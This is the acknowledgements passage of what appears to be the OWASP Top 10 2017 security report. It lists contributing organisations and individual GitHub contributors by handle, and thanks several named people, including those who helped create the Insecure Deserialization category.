• M. Limacher IT Dienstleistungen

• Micro Focus Fortify

• Minded Security

• National Center for Cyber Security Technology

• Network Test Labs Inc.

• Osampa

• Paladion Networks

• Purpletalk

• Secure Network

• Shape Security

• SHCP

• Softtek

• Synopsis

• TCS

• Vantage Point

• Veracode

• Web.com



For the first time, all data provided for the Top 10 release, as well as the full list of sources, are publicly available.


Individual project contributors

We would like to thank the individual project contributors who made a tangible contribution to the work of creating the Top 10 on GitHub:


• ak47gen

• alonergan

• ameft

• anantshri

• bandrzej

• bchurchill

• binarious

• bkimminich

• Boberski

• borischen

• Calico90

• chrish

• clerkendweller

• D00gs

• davewichers

• drkknight

• drwetter

• dune73

• ecbftw

• einsweniger

• ekobrin

• eoftedal

• frohoff

• fzipi

• gebl

• Gilc83

• gilzow

• global4g

• grnd

• h3xstream

• hiralph

• HoLyVieR

• ilatypov

• irbishop

• itscooper

• ivanr

• jeremylong

• jhaddix

• jmanico

• joaomatosf

• jrmithdobbs

• jsteven

• jvehent

• katyanton

• kerberosmansour

• koto

• m8urnett

• mwcoates

• neo00

• nickthetait

• ninedter

• ossie-git

• PauloASilva

• PeterMosmans

• pontocom

• psiinon

• pwntester

• raesene

• riramar

• ruroot

• securestep9

• securitybits

• SPoint42

• sreenathsasikumar

• starbuck3000

• stefanb

• sumitagarwalusa

• taprootsec

• tghosth

• TheJambo

• thesp0nge

• toddgrotenhuis

• troymarshall

• tsohlacol

• vdbaan

• yohgaki



We would also like to thank everyone who sent their feedback via Twitter, by e-mail or in any other way.

And of course we want to acknowledge Dirk Wetter, Jim Manico and Osama Elnaggar for their enormous contribution. Chris Frohoff and Gabriel Lawrence also provided invaluable help in creating the new category A8:2017-Insecure Deserialization.









